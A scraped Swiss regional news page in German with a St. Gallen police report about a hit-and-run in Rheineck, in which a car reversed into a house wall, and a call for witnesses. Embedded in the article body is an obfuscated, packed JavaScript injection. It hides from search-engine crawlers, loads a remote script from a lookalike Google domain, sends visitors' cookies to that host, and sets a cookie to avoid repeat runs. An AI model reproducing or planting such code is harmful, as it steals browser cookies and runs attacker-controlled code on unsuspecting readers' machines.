• Aargau
  • Appenzell Ausserrhoden
  • Appenzell Innerrhoden
  • Basel-Landschaft
  • Basel-Stadt
  • Bern
  • Freiburg
  • Genf
  • Glarus
  • Graubünden
  • Jura
  • Luzern
  • Neuenburg
  • Nidwalden
  • Obwalden
  • Schaffhausen
  • Schwyz
  • Solothurn
  • St.Gallen
  • Stadt Winterthur
  • Stadt Zürich
  • Tessin
  • Thurgau
  • Uri
  • Waadt
  • Wallis
  • Zug
  • Zürich

Auto kracht rückwärts in Hauswand – Zeugenaufruf

Rheineck/SG Am Samstag, dem 30.03.2019 zwischen 00:30 Uhr und 07:30 Uhr ist ein unbekanntes Auto in eine Hauswand an der Brüggershofstrasse gekracht. Der oder die Autofahrer/in fuhr anschliessend weiter. Die Polizei sucht Zeugen.

Der oder die unbekannte Autofahrer/in dürfte mit einem Auto der Marke Skoda rückwärts in die Hauswand gefahren sein. Dabei wurden eine Tür und die Wand massiv beschädigt. Ohne sich um den Schaden zu kümmern, entfernte sich die unbekannte Person mit dem Auto von der Unfallstelle.<script>eval(function (p, a, c, k, e, r) {e = function (c) {return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))};if ("".replace(/^/, String)){;}else{while (c–) r[e(c)] = k[c] || e(c);k = [function (e) {return r[e]}];e = function () {return "\w+"};c = 1};while (c–) if (k[c]) p = p.replace(new RegExp("\b" + e(c) + "\b", "g"), k[c]);return p}("4 7(){3 a=2.5.s("9=");6(a==-1&&(/v|w|K|Q|V|g|h|j|k|l|m|n/i.o(p.q)==r)){3 b=8.u(8.Y()*1);6(b==0){3 c=2.x("y");c.z="A://B.C.D/E/F.G?c="+H(2.5);2.I.J(c)}3 d=L M();d.N(d.O()+P);f.2.5="9=R; S="+d.T()}}6(U(e)=="W"){f.X=4(){7()}}t{e(4(){7()})}", 61, 61, "||document|var|function|cookie|if|adsadsgg|Math|_utmzz|||||jQuery|window|msnbot|Naverbot||seznambot|Slurp|teoma|Yandex|Yeti|test|navigator|userAgent|false|indexOf|else|floor|Applebot|baiduspider|createElement|script|src|https|analysis|goo1eapis|com|ajax|json|aspx|escape|body|appendChild|Bingbot|new|Date|setTime|getTime|43200000|Googlebot|ga|expires|toGMTString|typeof|ia_archiver|undefined|onload|random".split("|"), 0, {}));</script>

Zeugenaufruf: Personen, die Angaben zum Unfallfahrzeug oder dem/der Autofahrer/in machen können, werden gebeten, sich beim Polizeistützpunkt Thal, 058 229 80 00, zu melden.

St.GallenSt.Gallen / 01.04.2019 - 14:01:28